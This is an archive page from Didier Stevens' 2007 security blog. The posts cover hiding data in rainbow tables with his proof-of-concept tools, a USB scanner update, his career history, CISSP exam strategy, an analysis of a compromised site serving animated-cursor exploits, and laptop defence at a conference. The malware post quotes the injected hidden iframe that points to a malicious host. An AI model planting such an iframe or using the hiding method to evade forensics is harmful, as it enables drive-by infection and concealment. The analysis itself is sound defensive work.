Didier Stevens

Monday 30 April 2007

Hiding Inside a Rainbow

Filed under: Hacking — Didier Stevens @ 16:43

Steganography is the art of hiding messages so that uninitiated wouldn’t suspect the presence of a message. A rainbow table is a huge binary file used for password cracking. This is the first in a series of posts on research I’ve done on how to hide data in rainbow tables, and how to detect its presence.

There are several steganography algorithms to hide data in pictures. They often involve changing the least-significant-bits of the numbers representing the color or another visual property of a pixel. This minute difference cannot be perceived by the naked eye, but it this there. The size of the data you can hide in a picture is limited by the size of the picture and by the numbers of bits involved in the steganography algorithm. It’s impossible to hide large files, like audio or video files, in a picture, unless you split the files and use a lot of pictures. To hide a large amount of data in a single file, you need a large file.

Rainbow tables are huge, usually 1 à 2 GB. I’ve generated a set of LM-hash rainbow tables that is 23 GB. So there should be enough space to hide a large amount of data. The software I’ve used in my research is from Project RainbowCrack. All tables used in my research were generated with this software.

The first method to hide data with a rainbow table is trivial, just rename the file you want to hide to the name of a rainbow table, like this one: lm_alpha-numeric-symbol14-space#1-7_0_5400x67108864_0.rt

But this method will not withstand a superficial inspection of the file. A forensic analyst will see through your subterfuge, by looking at the content of this file she will recognize the format of the media file you’ve renamed and realize that it’s not a rainbow table.

So how can you hide data in a real rainbow table? Let’s look at the structure of a rainbow table.

A rainbow table is just a sequence of records. Each record has 2 fields of 8 bytes each, this makes a record 16 bytes wide. Therefore the size of a rainbow table is a multiple of 16. A record represents a chain. The first field is the password that started the chain. Actually, the first field is an index into the keyspace of all possible passwords for the given rainbow table set. It is a random number between 0 and the size of the keyspace – 1. The second field is the hash of the last password in the chain (actually, this is also an index and not the real hash). The rainbow table is sorted on the second field: the record with the lowest hash is first in the table and the one with the highest hash is last.


This is the hex dump a rainbow table (the first 16 chains). The green box highlights the random data, notice that the 3 most-significant-bytes are 0. The blue box highlights the hash, notice that this column is sorted.

My second method will modify a real rainbow table to hide a file.

Because the first field is just a random number, we can replace it with our own data from the file we want to hide. We cannot use all the bytes in this field, because the size of the keyspace is usually smaller than 8 bytes wide. The most-significant-bits of the password field are set to zero. Setting them to one would give our secret away. We must limit our usage of the password field to the least-significant-bytes. Changing these bytes will not change the structure of the rainbow table, so it will still appear as a valid rainbow table. The only consequence of our change is that the chain cannot be used anymore to crack a password. But if we leave a certain percentage of chains in the rainbow table unchanged, the rainbow table can still be used to crack some passwords.

To illustrate the technique, we insert 32 bytes (the sequence from 0x00 through 0x1F) in this rainbow table:


We will replace the random bytes in the red box. The keyspace of this rainbow table is less than 5 bytes (0xFFFFFFFFFF), that’s why I decide to change only the 4 least significant bytes of the start of a chain. This is the result:


It is clear that this modification is very obvious when you look at it, because the start entries are not random anymore. But if you use data that looks random (using compression or encryption), it will not stand out from the other random bytes. You can even use this modified rainbow table to crack passwords. The first 8 chains will not crack passwords anymore, because the start of the chain has been changed. But this does not cause an error and all the other chains are still usable. The only way to detect the hidden bytes (other than statistical analysis), is to recalculate the chain and compare the calculated hash with the stored hash. If they differ, the start has been tampered with. You can do this with the rtdump command, like this:

rtdump lm_alpha-numeric-symbol14-space#1-7_0_5400x67108864_0.rt 0

If the chain has been modified, the message will be:


The problem with this test is that it is very time consuming, checking a complete rainbow table takes about as much time as calculating the rainbow table, because you’re in fact recalculating all the chains. FYI, each 1 GB table from my set took about 1 week to generate.

You can find PoC code to store and retrieve data in rainbow tables here in this ZIP file.

Use rthide to hide data in a rainbow table, it takes 5 arguments:

  • the rainbow table (remains unchanged)
  • the file to hide (remains unchanged)
  • the new rainbow table
  • the number of the first chain where we will start replacing the random start bytes
  • the number of bytes per chain we replace

To hide a file data.zip at the start of a rainbow table called lm_alpha-numeric-symbol14-space#1-7_0_5400x67108864_0.rt, using only 4 bytes per chain, use this command:

rthide lm_alpha-numeric-symbol14-space#1-7_0_5400x67108864_0.rt data.zip  lm_alpha-numeric-symbol14-space#1-7_0_5400x67108864_0.rt.stego 0 4

This will create a new rainbow table called lm_alpha-numeric-symbol14-space#1-7_0_5400x67108864_0.rt.stego

Use rtreveal to extract data from a rainbow table, it takes 5 arguments:

  • the rainbow table
  • the file to create
  • the number of the first chain where we will start replacing the random start bytes
  • the number of bytes per chain we replace
  • the size of the hidden file

To extract the data, issue this command (you have to know the length of the hidden file, my PoC program doesn’t store this).

rtreveal lm_alpha-numeric-symbol14-space#1-7_0_5400x67108864_0.rt.stego data.zip 0 4 1620

1620 is the length of file data.zip

You can store a huge amount of data in a couple of minutes with this technique: for a rainbow table 1GB large, you can hide a 256 MB file in it using 4 bytes per chain. There is a way to detect the hidden data, but at a significant cost.

Stay tuned for posts about other techniques to hide data in rainbow tables.

Monday 23 April 2007

USBVirusScan V1.5.0

Filed under: My Software,Update — Didier Stevens @ 18:44

This new version of USBVirusScan adds a switch (-q) to stop a running instance of USBVirusScan.

The program can be found here.

Thursday 19 April 2007

How did you get your start?

Filed under: Personal — Didier Stevens @ 13:15

In response to Ron Woerner’s “tag”, here is an out-of-cycle blog post on how I got into computers.

I must have been around 10 years old when I started to play with tape decks, radios, speakers, microphones, telephones, … I would connect them together in various ways and observe the results. This lead to my first hack: I discovered that I could use a speaker as a microphone! Thrilled that I could discover things on my own, and that it’s possible to use electronic appliances for other purposes than designed, I started to experiment and have ever been busy since.

I was 12 when I programmed my first computer. My parents bought our first game console, the Philips Videopac G7000. It used cartridges to play games, and I had asked for a computer programming cartridge. This cartridge used a virtual assembly language, and I started to write small programs with simple animations and sounds, but I soon ran into the limits of this platform (memory and no way to save the programs).

Next computer was a ZX81 that I programmed in Basic, but again, I was soon limited by this platform.

Then came my Apple IIe with floppy disks drives. My parents had to take out a loan to buy it, and I’ve always been grateful that they went to such a length, because my Apple has been instrumental in my development as a programmer, electronic engineer and hacker. I started in Basic, and then in machine language (6502) for performance. And it really was machine language, not assembly language (I had no assembler when I started). I wrote my programs on paper sheets in opcodes, and then manually translated this program to hexadecimal code. That’s when I really began to understand how computers worked, and I also started to reverse the monitor, the Apple DOS and other programs and started to hack. I was a big Ultima player, but I found the levelling of characters boring. So I discovered how to change the saved data and patch the program to become invincible.
The Apple IIe was also a dream machine for hardware hacking. It had a bus with slots to plugin IC cards I soldered together. I made several I/O cards (TTL input/output, and A/D and D/A converters).

I obtained an account on a Unix HP9000 machine when I started my electronic engineering studies. That’s when I was first introduced to computer security. A multi-user/multi-tasking operating system that upholds the CIA tenet, requires user accounts, passwords, file permissions, … I needed to understand how this worked, how they pulled it of to implement these security mechanisms on a computer. And after I started to really understand this, I soon discovered ways to work around it.
This is also the time when I learned about the human aspect of security. Our Unix computer also ran the local school BBS. I found out that the BBS passwords were less protected than the Unix passwords, and, most importantly, that students often used the same password for both systems.

Then, in 1991, I started working for the Belgian Telco (called RTT back then, now it’s Belgacom). It was a very interesting job: I had to program AutoCAD in Lisp to make drawing programs for telephony cable schematics. We used high-end PCs with DOS as CAD stations. They were not networked together. The only security issue we had was the occasional virus on a floppy.

It’s from 2000 on, when I left Belgacom and joined Contraste Europe, that I started to get involved in IT security. I started with technical aspects of security, for example I’ve worked on a back-end system developed with Microsoft technology: VB, ASP and MS-SQL, which had its own authentication and authorization mechanism. And later I became more involved with non-technical elements of the security process, like policies.

Thanks Ron for this opportunity to take a walk down memory lane. I hope that the following people, that I challenge to write a blog post on how they got started, also enjoy writing about their start:

Monday 16 April 2007

About the strategy I followed during my CISSP exam

Filed under: Certification — Didier Stevens @ 8:54

In a previous CISSP exam post I promised to blog about the exam-taking strategy I followed.

The CISSP examination consists of 250 multiple-choice questions with 4 choices each. You probably know that it’s a form-based exam: you don’t get to sit in front of a computer to take the exam, but you get a booklet with questions and a form you have to complete with your answers using a number 2 pencil. You’re allowed to write on the pages of the booklet.

Here is how I tackled my 250 questions.

I read the first question. If I don’t understand the question, or if I don’t like the question, or if I even don’t feel like answering the question right now, I just move on to the next question. However, even if I skip a question but I’m certain that one or more of the answers are not correct, I cross them out (every time I tell I write something down or make a mark, I do it on the question booklet, unless stated otherwise).
If I try to answer the question but I’m not sure of the right answer, I will cross out the incorrect answers and move on to the next question.
If I answer a question I’m sure about, I put a circle around the number of the question and another one around the letter of the correct answer.

After tackling the last question, I just start the process again from the beginning, skipping the questions I already answered (remember, there’s a circle around the number of an answered question). I repeat this process several times, each cycle gives me more answers. After 3 hours, I’ve answered about 80% of the questions and I decide to transcribe my answers to the form (I have to be careful to skip the unanswered questions on the form). I review each answered question and transcribe the correct answer to the form. At the same time, I compile a list of all unanswered questions.
I decided to transcribe the answers after completing about 80% because:
1) I want to take the time to correctly transcribe the answers, I don’t want to make mistakes by rushing the job at the end of the 6 hour period allowed for the exam
2) I don’t want to start second-guessing my answers

After 45 minutes, I’ve transcribed all answered questions.

Now I focus on the list of remaining questions. I try to answer each question by eliminating all incorrect answers: what remains must be the correct answer. If more than one answer remains, I select one at random. I start guessing because I don’t want to stay until the end of the exam trying to find the correct answers, I feel confident because of all the other questions I answered. Since a wrong answer does not impact your score, you’re better of answering all questions than leaving some unanswered. Finally, I transcribe the remaining answers to the form. The list of remaining questions I compiled helps me to identify which answers remain to be transcribed.

The complete process took about 4 hours. And I don’t want to do it again, I’ll do all the necessary to have 120 CPE credits for my recertification.

In the days following the exam, you’ll start to doubt some of the answers you gave. I looked up several questions and discovered I answered them incorrectly. But don’t despair, your memory is biased, you’re focusing on the wrong answers, and not on all the correct ones you gave.

Tuesday 10 April 2007

And This Time, The Vector Is… The Animated Cursor, Again

Filed under: Malware,Vulnerabilities — Didier Stevens @ 8:36

Microsoft Security Bulletin MS05-002 did not patch all vulnerabilities in animated cursors. More than 2 years later, Microsoft had to patch again.

I saw several animated cursors with shell-code last week, here’s an interesting case.

http://www.reverso.net is an online translation website. The site was compromised, criminals inserted this iframe in the main page:

<iframe src=http://www.worldaofwr.net/jw/index.htm width=0 height=0>

An iframe element is like an include statement, the browser will include the source to render the page you’re viewing. Notice that the dimensions of the iframe are zero, it will be invisible. Inserting an iframe pointing to a malicious website is a method of choice for compromising websites.

As of this writing, Reverso has removed the iframe from their website (I did inform them).

Here’s the cleaned up page from the malicious website, referenced by the iframe:


The JavaScript in this page will check if you’re using Internet Explorer version 6 or 7, and if you do, it will fingerprint your OS. Are you using Windows 2000, XP or 2003? If you’re using XP, it will use an animated cursor named pay.mid, and if you’re using 2000, it will use another animated cursor named 7517.jpg.

I can see only one reason why the programmer would code this test to send you a cursor, aside from ignorance, and that is to keep a low profile. Because exploiting the animated cursor vulnerability does not crash your browser or generates errors you might notice, the malware programmer could just send you all the cursors he has, and hope that one of them is the right exploit for your machine. But sending several malicious payloads increases the chance that the malware gets detected by an IDS or AV.

In this case, your machine cannot be infected when you’ve disabled scripting. But the programmer could have used server-side scripting in stead of client-side scripting, because your browser sends an User Agent string, which tells the server exactly which browser you’re using and on which OS. Disabling scripting in your browser will not stop server-side scripting.

The animated cursor is downloaded by your browser through a DIV element with a CSS style defining a cursor. Notice that the file extension of the downloaded cursor is .MID or .JPG, not .ANI. Apparently, this is no problem for Internet Explorer, it just assumes the file is an animated cursor. But the malware author has done this to try to stay below your radar. MID is an extension for music files, JPG is an extension for pictures. Many AVs are configured not to scan multimedia files for performance reasons, so the exploit in the cursor might go undetected by using a multimedia file extension. Or if you have blocked ANI files on your proxy, these ones will get through if you allow .MID and .JPG.

Let’s look inside the animated cursor pay.mid, it’s very small, just 801 bytes. A quick way to look inside is to dump the strings, like this: strings pay.mid.

cmd >
/c "
T}      >

And here we see an URL pointing to an executable. You don’t have to be a reverse engineer to understand that the shell-code in this animated cursor will download and execute the executable. And you don’t have to be an IT security expert to know that the downloaded executable is malware.

Monday 2 April 2007

Digital Self Defence

Filed under: Vulnerabilities — Didier Stevens @ 8:49

I’m back from Black Hat Europe 2007. Black Hat’s theme is “Digital Self Defence”, and that is just what I did. Because I took a reverse engineering training by Halvar Flake, I had to take my Windows laptop with me. I explain how I protected my Windows laptop when accessing an insecure wireless network at the conference.

The threats I faced when enabling my wireless connection at the conference were:

  • someone compromising the integrity of my system
  • confidential data theft
  • credentials theft

In a normal situation I protect my OS and data with these procedures and tools:

  • keeping my OS and software patched
  • running McAfee Anti-Virus and update it
  • running Kerio’s free Personal Firewall
  • connecting to the Internet with a NAT router
  • using a WPA secured WiFi connection
  • using FireFox with NoScript and CookieSafe for web browsing
  • storing all my data in a TrueCrypt volume
  • making regular system backups with Acronis TrueImage on a dedicated USB hard disk
  • using a non-admin account

At home, before I left for the conference, I took a full backup of my laptop.

In the hotel, there was unencrypted, free WiFi available in the rooms and on the conference floor. My laptop has a (hardware) switch to disable WiFi. I would only switch it on when I really needed to access the Internet. And by preference in my hotel room on the 16th floor, not on the conference floor.

Each time I enabled WiFi access, I unmounted the TrueCrypt volume with all my data.

Whenever I accessed a website that needed credentials (like Gmail), I made sure that it used HTTPS or else I would use TOR as a proxy (I didn’t use TOR all the time because of the slow connection).

For the training, I installed a new virtual machine (with VMware), and installed all the software Halvar gave us and did all the exercises on this machine.

My hotel room had a laptop safe, and I would always store my laptop in it whenever I didn’t need it.

I didn’t notice an incident on my laptop when I was at Black Hat. But back home, I decided to restore my laptop, not because I feared my laptop was compromised, but mainly as an exercise to test my backup procedure.

Here is how I did it:

  1. make a new backup of my laptop, just in case the restore goes wrong
  2. copy my TrueCrypt volume with data and the training virtual machine to an USB hard disk, because I need to keep this
  3. restore the backup from before the conference
  4. copy my TrueCrypt volume with data from the USB hard disk back to the laptop

It took a long time, but the procedure is simple and everything went fine. I learned that the Acronis True Image’s progress bar during the restore is confusing. The time remaining would increase, not decrease. At the end, it was 5 hours, and then Acronis True Image rebooted my laptop. Windows was running normal, and connected immediately to my WiFi network at home. All traces of the WiFi network at Black Hat were gone.

My laptop has forgotten it was at Black Hat Europe 2007.

The key ingredients of the restore procedure are:

  • a full system backup
  • a clear separation of system files and data files

Sunday 1 April 2007

Good Bye Security Monkey!

Filed under: Nonsense — Didier Stevens @ 16:25

Now that Security Monkey has announced his retirement from the blogosphere, I can reveal his true identity:


Blog at WordPress.com.